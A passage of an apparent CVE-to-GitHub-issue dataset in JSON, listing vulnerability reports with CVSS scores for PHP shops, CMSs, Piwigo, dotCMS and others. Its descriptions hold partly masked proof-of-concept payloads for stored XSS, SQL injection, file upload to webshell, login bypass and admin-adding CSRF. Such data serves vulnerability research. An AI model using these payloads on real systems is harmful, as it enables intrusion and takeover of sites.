  50678. "Issue_Url_old": "https://github.com/joelister/bug/issues/1",
  50679. "Issue_Url_new": "https://github.com/joelister/bug/issues/1",
  50680. "Repo_new": "joelister/bug",
  50681. "Issue_Created_At": "2019-04-15T03:44:11Z",
  50682. "description": "APITAG NUMBERTAG Cross Site Scripting. Stored cross site scripting (XSS) vulnerability in the APITAG field found in the APITAG New Forum\" page under the APITAG menu in APITAG NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: \"> APITAG pt>alert NUMBERTAG APITAG / Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG FILETAG When an unauthenticated user visits the page, the code gets executed: FILETAG",
  50683. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  50684. "severity": "MEDIUM",
  50685. "baseScore": 5.4,
  50686. "impactScore": 2.7,
  50687. "exploitabilityScore": 2.3
  50688. },
  50689. {
  50690. "CVE_ID": "CVE-2020-19049",
  50691. "Issue_Url_old": "https://github.com/joelister/bug/issues/2",
  50692. "Issue_Url_new": "https://github.com/joelister/bug/issues/2",
  50693. "Repo_new": "joelister/bug",
  50694. "Issue_Created_At": "2019-04-15T04:14:08Z",
  50695. "description": "Persistent XSS on APITAG NUMBERTAG Stored cross site scripting (XSS) vulnerability in the APITAG field found in the APITAG New Forum\" page under the APITAG menu in APITAG NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: \"> APITAG alert NUMBERTAG APITAG // Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG FILETAG POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: acploginattempts NUMBERTAG APITAG mybb FILETAG",
  50696. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  50697. "severity": "MEDIUM",
  50698. "baseScore": 5.4,
  50699. "impactScore": 2.7,
  50700. "exploitabilityScore": 2.3
  50701. },
  50702. {
  50703. "CVE_ID": "CVE-2020-19107",
  50704. "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/9",
  50705. "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/9",
  50706. "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
  50707. "Issue_Created_At": "2020-01-17T08:35:51Z",
  50708. "description": "there is a sql injection vulnerability in FILETAG parameter \"isbn\". version NUMBERTAG No login required. POC: POST FILETAG HTTP NUMBERTAG Host NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG +a&save_change NUMBERTAG FILETAG View source code APITAG APITAG filter input of parameter \"isbn\" author: EMAILTAG .cn",
  50709. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50710. "severity": "CRITICAL",
  50711. "baseScore": 9.8,
  50712. "impactScore": 5.9,
  50713. "exploitabilityScore": 3.9
  50714. },
  50715. {
  50716. "CVE_ID": "CVE-2020-19108",
  50717. "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/10",
  50718. "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/10",
  50719. "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
  50720. "Issue_Created_At": "2020-01-17T08:39:23Z",
  50721. "description": "there is a sql injection vulnerability in FILETAG parameter \"pubid\". version NUMBERTAG No login required. POC: URLTAG or APITAG a FILETAG View source code FILETAG APITAG APITAG filter input of parameter \"pubid\" author: EMAILTAG .cn",
  50722. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50723. "severity": "CRITICAL",
  50724. "baseScore": 9.8,
  50725. "impactScore": 5.9,
  50726. "exploitabilityScore": 3.9
  50727. },
  50728. {
  50729. "CVE_ID": "CVE-2020-19109",
  50730. "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/12",
  50731. "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/12",
  50732. "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
  50733. "Issue_Created_At": "2020-01-17T08:47:24Z",
  50734. "description": "there is a sql injection vulnerability in FILETAG parameter \"bookisbn\" . version NUMBERTAG No login required. POC: URLTAG or APITAG a APITAG View source code FILETAG APITAG APITAG filter input of parameter \"bookisbn\" author: EMAILTAG .cn",
  50735. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50736. "severity": "CRITICAL",
  50737. "baseScore": 9.8,
  50738. "impactScore": 5.9,
  50739. "exploitabilityScore": 3.9
  50740. },
  50741. {
  50742. "CVE_ID": "CVE-2020-19110",
  50743. "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/11",
  50744. "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/11",
  50745. "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
  50746. "Issue_Created_At": "2020-01-17T08:43:28Z",
  50747. "description": "there is a sql injection vulnerability in FILETAG parameter \"bookisbn\". version NUMBERTAG No login required. POC: URLTAG or APITAG a FILETAG View source code FILETAG APITAG APITAG filter input of parameter \"bookisbn\" author: EMAILTAG .cn",
  50748. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50749. "severity": "CRITICAL",
  50750. "baseScore": 9.8,
  50751. "impactScore": 5.9,
  50752. "exploitabilityScore": 3.9
  50753. },
  50754. {
  50755. "CVE_ID": "CVE-2020-19111",
  50756. "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/14",
  50757. "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/14",
  50758. "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
  50759. "Issue_Created_At": "2020-01-17T08:55:48Z",
  50760. "description": "there is a login bypass vulnerability in FILETAG . version NUMBERTAG No login required. View source code FILETAG APITAG he judgment is that if the query results of login name and password are not the same, the judgment is that the password or user name is wrong This is obviously wrong. According to this meaning, you can log in successfully as long as the user name and password are matched We test that the login name is admin password arbitrary FILETAG Login succuss! APITAG this code to if($name != $row['name'] || $pass != $row['pass']){ author: EMAILTAG .cn",
  50761. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50762. "severity": "CRITICAL",
  50763. "baseScore": 9.8,
  50764. "impactScore": 5.9,
  50765. "exploitabilityScore": 3.9
  50766. },
  50767. {
  50768. "CVE_ID": "CVE-2020-19112",
  50769. "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/13",
  50770. "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/13",
  50771. "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
  50772. "Issue_Created_At": "2020-01-17T08:51:12Z",
  50773. "description": "there is a sql injection vulnerability in FILETAG parameter \"bookisbn\" . version NUMBERTAG No login required. POC\uff1a URLTAG or APITAG a FILETAG View source code FILETAG APITAG APITAG filter input of parameter \"bookisbn\" author: EMAILTAG .cn",
  50774. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50775. "severity": "CRITICAL",
  50776. "baseScore": 9.8,
  50777. "impactScore": 5.9,
  50778. "exploitabilityScore": 3.9
  50779. },
  50780. {
  50781. "CVE_ID": "CVE-2020-19113",
  50782. "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/15",
  50783. "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/15",
  50784. "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
  50785. "Issue_Created_At": "2020-01-17T09:02:08Z",
  50786. "description": "there is a arbitrary file upload in FILETAG . version NUMBERTAG No login required. POC: upload form APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG or post data POST FILETAG HTTP NUMBERTAG Host NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Connection: close Cookie: APITAG Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"add NUMBERTAG Content Disposition: form data; name=\"image\"; APITAG Content Type: text/php APITAG NUMBERTAG Content Disposition: form data; name=\"save\" upload NUMBERTAG after you upload your'e file u will find it here PATHTAG FILETAG View source code FILETAG APITAG APITAG check upload file. author: EMAILTAG .cn",
  50787. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50788. "severity": "CRITICAL",
  50789. "baseScore": 9.8,
  50790. "impactScore": 5.9,
  50791. "exploitabilityScore": 3.9
  50792. },
  50793. {
  50794. "CVE_ID": "CVE-2020-19114",
  50795. "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/8",
  50796. "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/8",
  50797. "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
  50798. "Issue_Created_At": "2020-01-17T08:29:51Z",
  50799. "description": "there is sql injection vulnerability in FILETAG parameter \"publisher\". version NUMBERTAG POC: CODETAG APITAG View source code APITAG APITAG filter input of parameter \"publisher\" author: EMAILTAG .cn",
  50800. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50801. "severity": "CRITICAL",
  50802. "baseScore": 9.8,
  50803. "impactScore": 5.9,
  50804. "exploitabilityScore": 3.9
  50805. },
  50806. {
  50807. "CVE_ID": "CVE-2020-19118",
  50808. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/14",
  50809. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/14",
  50810. "Repo_new": "yzmcms/yzmcms",
  50811. "Issue_Created_At": "2019-04-24T13:37:50Z",
  50812. "description": "Stored XSS vulnerability in yzmcms NUMBERTAG Because the data inputed by the user is not effectively filtered, so that attackers can inject javascript code into the HTML page for execution. Anyone who clicks on the page will trigger it The stored XXS vulnerability exists the PATHTAG POC: APITAG alert('XSS!') APITAG FILETAG APITAG the site_code parameter",
  50813. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  50814. "severity": "MEDIUM",
  50815. "baseScore": 5.4,
  50816. "impactScore": 2.7,
  50817. "exploitabilityScore": 2.3
  50818. },
  50819. {
  50820. "CVE_ID": "CVE-2020-19137",
  50821. "Issue_Url_old": "https://github.com/ShuaiJunlan/Autumn/issues/82",
  50822. "Issue_Url_new": "https://github.com/shuaijunlan/autumn/issues/82",
  50823. "Repo_new": "shuaijunlan/autumn",
  50824. "Issue_Created_At": "2019-04-28T05:08:49Z",
  50825. "description": "Infomation Unauthorized. Unauthorized status, you can get account password directly URLTAG FILETAG",
  50826. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  50827. "severity": "HIGH",
  50828. "baseScore": 7.5,
  50829. "impactScore": 3.6,
  50830. "exploitabilityScore": 3.9
  50831. },
  50832. {
  50833. "CVE_ID": "CVE-2020-19138",
  50834. "Issue_Url_old": "https://github.com/dotCMS/core/issues/17796",
  50835. "Issue_Url_new": "https://github.com/dotcms/core/issues/17796",
  50836. "Repo_new": "dotcms/core",
  50837. "Issue_Created_At": "2020-01-08T07:04:03Z",
  50838. "description": "File Upload. Describe the bug Upload jsp files to control the target server Steps to reproduce the behavior NUMBERTAG APITAG () determines whether uri starts with / asset FILETAG NUMBERTAG Can bypass restricted access to files under assets, like PATHTAG FILETAG FILETAG NUMBERTAG Upload malicious JSP file here FILETAG NUMBERTAG Get file id FILETAG NUMBERTAG Execute arbitrary server commands FILETAG NUMBERTAG Can upload even without authorization FILETAG dir like this FILETAG",
  50839. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50840. "severity": "CRITICAL",
  50841. "baseScore": 9.8,
  50842. "impactScore": 5.9,
  50843. "exploitabilityScore": 3.9
  50844. },
  50845. {
  50846. "CVE_ID": "CVE-2020-1914",
  50847. "Issue_Url_old": "https://github.com/facebook/hermes/issues/373",
  50848. "Issue_Url_new": "https://github.com/facebook/hermes/issues/373",
  50849. "Repo_new": "facebook/hermes",
  50850. "Issue_Created_At": "2020-09-29T21:47:01Z",
  50851. "description": "What should be included in NUMBERTAG This issue is to discuss which fixes should be backported to the next patch release NUMBERTAG Noted that release NUMBERTAG would be exclusively for RN NUMBERTAG branch out after NUMBERTAG is resolved.",
  50852. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50853. "severity": "CRITICAL",
  50854. "baseScore": 9.8,
  50855. "impactScore": 5.9,
  50856. "exploitabilityScore": 3.9
  50857. },
  50858. {
  50859. "CVE_ID": "CVE-2020-19142",
  50860. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/65",
  50861. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/65",
  50862. "Repo_new": "idreamsoft/iCMS",
  50863. "Issue_Created_At": "2019-04-28T01:55:13Z",
  50864. "description": "iCMS7 code.",
  50865. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50866. "severity": "CRITICAL",
  50867. "baseScore": 9.8,
  50868. "impactScore": 5.9,
  50869. "exploitabilityScore": 3.9
  50870. },
  50871. {
  50872. "CVE_ID": "CVE-2020-19157",
  50873. "Issue_Url_old": "https://github.com/TL-swallow/swallow/issues/14",
  50874. "Issue_Url_new": "https://github.com/tl-swallow/swallow/issues/14",
  50875. "Repo_new": "TL-swallow/swallow",
  50876. "Issue_Created_At": "2019-06-28T04:26:45Z",
  50877. "description": "wenkucms \u4e2a\u4eba\u4e2d\u5fc3\u81ea\u6211\u4ecb\u7ecd XSS. CODETAG",
  50878. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50879. "severity": "MEDIUM",
  50880. "baseScore": 6.1,
  50881. "impactScore": 2.7,
  50882. "exploitabilityScore": 2.8
  50883. },
  50884. {
  50885. "CVE_ID": "CVE-2020-19165",
  50886. "Issue_Url_old": "https://github.com/Mint60/PHP/issues/1",
  50887. "Issue_Url_new": "https://github.com/mint60/php/issues/1",
  50888. "Repo_new": "mint60/php",
  50889. "Issue_Created_At": "2020-04-14T04:27:35Z",
  50890. "description": "phpshe NUMBERTAG Blind SQL injection NUMBERTAG ulnerability description Test object NUMBERTAG website: PHPSHE shopping system NUMBERTAG the website domain name: FILETAG NUMBERTAG IP address: FILETAG NUMBERTAG ersion: PHPSHE B2C mall system NUMBERTAG build NUMBERTAG UTF8) Vulnerability description: Lingbao Jianhao network technology co., LTD. PHPSHE cms system background SQL injection vulnerability NUMBERTAG ulnerability details The FILETAG line NUMBERTAG execution flow introduces the FILETAG FILETAG FILETAG Line NUMBERTAG introduces FILETAG FILETAG the FILETAG line NUMBERTAG pe_select function to user level adjustment FILETAG The pe_select function is defined on line NUMBERTAG of PATHTAG In the pe_select function, the value of the userlevel_id parameter has undergone a series of processing of the dowhere function, and finally directly spliced into the sql statement, there is no security filtering. FILETAG The code for the _dowhere function FILETAG NUMBERTAG POC Vulnerability parameter userlevel_id CODETAG Vulnerability verification method: APITAG FILETAG",
  50891. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50892. "severity": "CRITICAL",
  50893. "baseScore": 9.8,
  50894. "impactScore": 5.9,
  50895. "exploitabilityScore": 3.9
  50896. },
  50897. {
  50898. "CVE_ID": "CVE-2020-19199",
  50899. "Issue_Url_old": "https://github.com/qinggan/phpok/issues/5",
  50900. "Issue_Url_new": "https://github.com/qinggan/phpok/issues/5",
  50901. "Repo_new": "qinggan/phpok",
  50902. "Issue_Created_At": "2019-05-03T07:34:07Z",
  50903. "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following two page poc\uff1a APITAG add a administrator APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  50904. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  50905. "severity": "HIGH",
  50906. "baseScore": 8.8,
  50907. "impactScore": 5.9,
  50908. "exploitabilityScore": 2.8
  50909. },
  50910. {
  50911. "CVE_ID": "CVE-2020-19212",
  50912. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1009",
  50913. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1009",
  50914. "Repo_new": "piwigo/piwigo",
  50915. "Issue_Created_At": "2019-05-05T08:40:59Z",
  50916. "description": "Piwigo NUMBERTAG SQL injection in FILETAG . An SQL injection has been discovered in the administration panel of Piwigo NUMBERTAG The vulnerability allows remote attackers that are authenticated as administrator to inject SQL code into a query and display. This could result in full information disclosure. The vulnerability was found in the 'delete' method in FILETAG , because it does not validate and filter the '$group' parameter when it gets the parameters. And the vulnerability could query any data in the database and display it on the page. In the figure, I obtained the encrypted password of the user table. FILETAG FILETAG",
  50917. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  50918. "severity": "MEDIUM",
  50919. "baseScore": 4.9,
  50920. "impactScore": 3.6,
  50921. "exploitabilityScore": 1.2
  50922. },
  50923. {
  50924. "CVE_ID": "CVE-2020-19213",
  50925. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1010",
  50926. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1010",
  50927. "Repo_new": "piwigo/piwigo",
  50928. "Issue_Created_At": "2019-05-06T10:00:18Z",
  50929. "description": "Piwigo NUMBERTAG SQL injection in FILETAG . Hi, I found a sql injection vulnerability in APITAG The 'move_categories' method is called when moving the album in APITAG but the method does not validate and filter the 'selection' and 'parent' parameters, thus causing the vulnerability. replace any of the following parameter in POST requests to reappear the vulnerability\uff1a APITAG or APITAG I use 'sqlmap' to reappear the vulnerability: FILETAG FILETAG",
  50930. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50931. "severity": "CRITICAL",
  50932. "baseScore": 9.8,
  50933. "impactScore": 5.9,
  50934. "exploitabilityScore": 3.9
  50935. },
  50936. {
  50937. "CVE_ID": "CVE-2020-19215",
  50938. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1011",
  50939. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1011",
  50940. "Repo_new": "piwigo/piwigo",
  50941. "Issue_Created_At": "2019-05-07T10:09:41Z",
  50942. "description": "Piwigo NUMBERTAG SQL injection in FILETAG and FILETAG . hi, I found two new vulnerabilities in FILETAG and FILETAG NUMBERTAG request URLTAG APITAG to have a private album then move the album from the right to the left payload: APITAG or use 'sqlmap' FILETAG FILETAG FILETAG FILETAG NUMBERTAG same as the first, request APITAG APITAG to have a private album then move the album from the right to the left payload: APITAG or use 'sqlmap' FILETAG FILETAG FILETAG FILETAG",
  50943. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  50944. "severity": "HIGH",
  50945. "baseScore": 8.8,
  50946. "impactScore": 5.9,
  50947. "exploitabilityScore": 2.8
  50948. },
  50949. {
  50950. "CVE_ID": "CVE-2020-19217",
  50951. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1012",
  50952. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1012",
  50953. "Repo_new": "piwigo/piwigo",
  50954. "Issue_Created_At": "2019-05-08T08:06:27Z",
  50955. "description": "Piwigo NUMBERTAG SQL injection in FILETAG . APITAG is a vulnerability in the FILETAG . FILETAG I didn't find the full trigger request in the browser, so I added the \u2018&filter_category_use=on\u2019 parameter to the request based on the code. ERRORTAG FILETAG FILETAG FILETAG FILETAG",
  50956. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  50957. "severity": "HIGH",
  50958. "baseScore": 8.8,
  50959. "impactScore": 5.9,
  50960. "exploitabilityScore": 2.8
  50961. },
  50962. {
  50963. "CVE_ID": "CVE-2020-19228",
  50964. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1242",
  50965. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1242",
  50966. "Repo_new": "bludit/bludit",
  50967. "Issue_Created_At": "2020-07-24T09:06:36Z",
  50968. "description": "File upload vulnerability. Bludit NUMBERTAG has a file upload vulnerability in 'backup' plugin . It requires administrator privileges NUMBERTAG open URLTAG Activate 'backup' plugin and click the Settings FILETAG NUMBERTAG open URLTAG upload the ' FILETAG zip file that I provide . The zip file has a FILETAG in the bl content\\uploads directory, Notices: please be careful not to open or modify this zip file, because this will cause an error FILETAG NUMBERTAG click the APITAG Backup' FILETAG NUMBERTAG FILETAG Open the url can see phpinfo ,and can use 'ant' to connect the backdoor via FILETAG FILETAG FILETAG",
  50969. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  50970. "severity": "HIGH",
  50971. "baseScore": 7.2,
  50972. "impactScore": 5.9,
  50973. "exploitabilityScore": 1.2
  50974. },
  50975. {
  50976. "CVE_ID": "CVE-2020-19229",
  50977. "Issue_Url_old": "https://github.com/thinkgem/jeesite/issues/490",
  50978. "Issue_Url_new": "https://github.com/thinkgem/jeesite/issues/490",
  50979. "Repo_new": "thinkgem/jeesite",
  50980. "Issue_Created_At": "2019-05-05T08:10:51Z",
  50981. "description": "jeesite\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e. jeesite APITAG command execution vulnerability\uff09 \u6f0f\u6d1e\u5229\u7528\u8fc7\u7a0b jeesite \u4f7f\u7528\u4e86 apache shiro APITAG FILETAG \u56e0apache APITAG \u4ee5\u516c\u7f51\u67d0\u7f51\u7ad9\u4e3a\u4f8b\uff1a\uff08\u53c2\u8003\uff1a URLTAG \uff09 FILETAG APITAG APITAG \u4fee\u590d\u5efa\u8bae \u5347\u7ea7 Shiro NUMBERTAG",
  50982. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50983. "severity": "CRITICAL",
  50984. "baseScore": 9.8,
  50985. "impactScore": 5.9,
  50986. "exploitabilityScore": 3.9
  50987. },
  50988. {
  50989. "CVE_ID": "CVE-2020-19263",
  50990. "Issue_Url_old": "https://github.com/sansanyun/mipcms5/issues/4",
  50991. "Issue_Url_new": "https://github.com/sansanyun/mipjz/issues/4",
  50992. "Repo_new": "sansanyun/mipjz",
  50993. "Issue_Created_At": "2019-05-12T08:48:53Z",
  50994. "description": "Mipcms NUMBERTAG has a CSRF vulnerability that can add the admin user. After the administrator logs in, accessing the following two links can add an administrator user Poc address : URLTAG Add a user: http:// FILETAG FILETAG Promote user privileges to administrator privileges http:// FILETAG",
  50995. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  50996. "severity": "HIGH",
  50997. "baseScore": 8.8,
  50998. "impactScore": 5.9,
  50999. "exploitabilityScore": 2.8
  51000. },
  51001. {
  51002. "CVE_ID": "CVE-2020-19265",
  51003. "Issue_Url_old": "https://github.com/tifaweb/Dswjcms/issues/4",
  51004. "Issue_Url_new": "https://github.com/tifaweb/dswjcms/issues/4",
  51005. "Repo_new": "tifaweb/dswjcms",
  51006. "Issue_Created_At": "2019-05-14T12:59:19Z",
  51007. "description": "There is a Stored XSS vulnerability in Dswjcms NUMBERTAG A Stored XSS vulnerability exists in Dswjcms NUMBERTAG allowing an remote attacker to execute HTML or APITAG code via the PATHTAG APITAG \"> APITAG APITAG alert(/xss/) APITAG <a Add a Friendship Links FILETAG FILETAG Execute APITAG code FILETAG",
  51008. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  51009. "severity": "MEDIUM",
  51010. "baseScore": 6.1,
  51011. "impactScore": 2.7,
  51012. "exploitabilityScore": 2.8
  51013. },
  51014. {
  51015. "CVE_ID": "CVE-2020-19266",
  51016. "Issue_Url_old": "https://github.com/tifaweb/Dswjcms/issues/5",
  51017. "Issue_Url_new": "https://github.com/tifaweb/dswjcms/issues/5",
  51018. "Repo_new": "tifaweb/dswjcms",
  51019. "Issue_Created_At": "2019-05-14T13:05:03Z",
  51020. "description": "There is a Stored XSS vulnerability in Dswjcms NUMBERTAG A Stored XSS vulnerability exists in Dswjcms NUMBERTAG allowing an attacker to execute HTML or APITAG code via the PATHTAG APITAG ERRORTAG Add an article FILETAG FILETAG Execute APITAG code FILETAG",
  51021. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  51022. "severity": "MEDIUM",
  51023. "baseScore": 6.1,
  51024. "impactScore": 2.7,
  51025. "exploitabilityScore": 2.8
  51026. },
  51027. {
  51028. "CVE_ID": "CVE-2020-19267",
  51029. "Issue_Url_old": "https://github.com/tifaweb/Dswjcms/issues/7",
  51030. "Issue_Url_new": "https://github.com/tifaweb/dswjcms/issues/7",
  51031. "Repo_new": "tifaweb/dswjcms",
  51032. "Issue_Created_At": "2019-05-14T13:13:23Z",
  51033. "description": "There is a Incorrect Access Control vulnerability in Dswjcms NUMBERTAG Dswjcms NUMBERTAG allowing an attacker to upload and execute arbitrary PHP code via the PATHTAG Upload PHP File Document content: APITAG FILETAG Access this PHP file FILETAG FILETAG",
  51034. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  51035. "severity": "CRITICAL",
  51036. "baseScore": 9.8,
  51037. "impactScore": 5.9,
  51038. "exploitabilityScore": 3.9
  51039. },
  51040. {
  51041. "CVE_ID": "CVE-2020-19268",
  51042. "Issue_Url_old": "https://github.com/tifaweb/Dswjcms/issues/6",
  51043. "Issue_Url_new": "https://github.com/tifaweb/dswjcms/issues/6",
  51044. "Repo_new": "tifaweb/dswjcms",
  51045. "Issue_Created_At": "2019-05-14T13:09:59Z",
  51046. "description": "There is a CSRF vulnerability in Dswjcms NUMBERTAG A CSRF vulnerability exists in Dswjcms NUMBERTAG allowing an attacker to add administrator users via the PATHTAG After the administrator user logged in ,open the following page that can add a administrator user Exp: CODETAG FILETAG",
  51047. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
  51048. "severity": "MEDIUM",
  51049. "baseScore": 5.7,
  51050. "impactScore": 3.6,
  51051. "exploitabilityScore": 2.1
  51052. },
  51053. {
  51054. "CVE_ID": "CVE-2020-19274",
  51055. "Issue_Url_old": "https://github.com/ShaoGongBra/dhcms/issues/3",
  51056. "Issue_Url_new": "https://github.com/shaogongbra/dhcms/issues/3",
  51057. "Repo_new": "shaogongbra/dhcms",
  51058. "Issue_Created_At": "2019-10-11T00:41:21Z",
  51059. "description": "Dhcms Stored XSS Vulnerabilities_in guestbook. Holes for details: in guestbook POST: CODETAG FILETAG you can Executed alert\u3002 FILETAG",
  51060. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  51061. "severity": "MEDIUM",
  51062. "baseScore": 6.1,
  51063. "impactScore": 2.7,
  51064. "exploitabilityScore": 2.8
  51065. },
  51066. {
  51067. "CVE_ID": "CVE-2020-19275",
  51068. "Issue_Url_old": "https://github.com/ShaoGongBra/dhcms/issues/4",
  51069. "Issue_Url_new": "https://github.com/shaogongbra/dhcms/issues/4",
  51070. "Repo_new": "shaogongbra/dhcms",
  51071. "Issue_Created_At": "2019-10-11T01:26:42Z",
  51072. "description": "dhcms Physical path leak. Vulnerability details NUMBERTAG Enter invalid content after the normal file, causing an error\u3002 url: URLTAG FILETAG NUMBERTAG Any file is fine, just enter invalid characters at the back\u3002 FILETAG",
  51073. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  51074. "severity": "MEDIUM",
  51075. "baseScore": 5.3,
  51076. "impactScore": 1.4,
  51077. "exploitabilityScore": 3.9
  51078. },
  51079. {
  51080. "CVE_ID": "CVE-2020-19280",
  51081. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/9",
